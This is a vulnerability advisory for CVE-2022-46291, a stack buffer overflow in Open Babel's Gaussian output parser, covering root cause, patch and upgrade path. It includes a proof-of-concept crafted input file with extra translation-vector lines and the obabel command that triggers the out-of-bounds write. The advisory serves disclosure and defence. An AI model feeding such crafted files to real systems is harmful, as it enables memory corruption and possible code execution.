high · 7.8CVE-2022-46291Jul 1, 2026

CVE-2022-46291: Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

A crafted Gaussian output file can write past the end of a 3-element stack array in Open Babel's chemistry file parser, potentially giving an attacker arbitrary code execution.

Packageopenbabel
Ecosystempip
Affected< 3.2.0
Fixed in3.2.0

The problem

Open Babel's Gaussian output reader in `gaussformat.cpp` declares a fixed-size stack array `vector3 translationVectors[3]` and an integer counter `numTranslationVectors = 0`.

When the parser encounters a `PeriodicType` line, it enters a `while` loop that reads subsequent lines and writes each one into the array, incrementing the counter with no upper-bound check. An attacker who supplies more than three translation-vector lines pushes writes beyond the array, corrupting adjacent stack memory.

The write lands in `vector3::Set()` with fully attacker-controlled x, y, z double values, making this a high-quality stack corruption primitive. CVSS 7.8 (local, no privileges required).

Proof of concept

A working proof-of-concept for CVE-2022-46291 in openbabel, with the exact payload below.

bash
# Minimal malicious Gaussian output file (.gal)
# Triggers the OOB write: 4+ PeriodicType vector lines
# exceed the translationVectors[3] stack array bound.

 Entering Link 1 = /fake/l1.exe
 #p hf/sto-3g

 Fake molecule

 Standard orientation:
 ---------------------------------------------------------------------
 Center     Atomic      Atomic             Coordinates (Angstroms)
 Number     Number       Type             X           Y           Z
 ---------------------------------------------------------------------
      1          6           0        0.000000    0.000000    0.000000
 ---------------------------------------------------------------------
PeriodicType 100
 1 2 3 1.000000 2.000000 3.000000
 1 2 3 4.000000 5.000000 6.000000
 1 2 3 7.000000 8.000000 9.000000
 1 2 3 1.100000 2.200000 3.300000
 1 2 3 4.400000 5.500000 6.600000
 1 2 3 7.700000 8.800000 9.900000

# Trigger:
# $ obabel -i gal malicious.gal -o sdf
# => ASAN: stack-buffer-overflow WRITE of size 8
#    in GaussianOutputFormat::ReadMolecule (gaussformat.cpp:635)

The root cause (CWE-787) is the missing bounds check on `numTranslationVectors` before indexing into `translationVectors[numTranslationVectors++]`. The loop exits only when EOF is reached or a line has fewer than 6 tokens, so an attacker can keep supplying 6-token lines indefinitely.

Each overflowing write calls `vector3::Set(x, y, z)` with values parsed directly from attacker-supplied tokens via `atof()`, giving full control over the written doubles. Depending on the stack layout and compiler, this can overwrite saved frame pointers or return addresses.

The patch (commit 40e85213) adds a guard `if (numTranslationVectors < 3)` (or equivalent) before the write, breaking the unbounded loop as soon as the array is full.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which includes commit 40e85213 adding the missing array-bounds check before every `translationVectors[numTranslationVectors++]` write in the Gaussian, MSI, MOPAC, and MOPAC-IN readers. No workaround exists for older versions other than refusing to parse untrusted `.gal` / `.g09` / `.g16` files.

Reported by Cisco Talos Intelligence Group.

References: [1][2][3][4][5][6]

Related research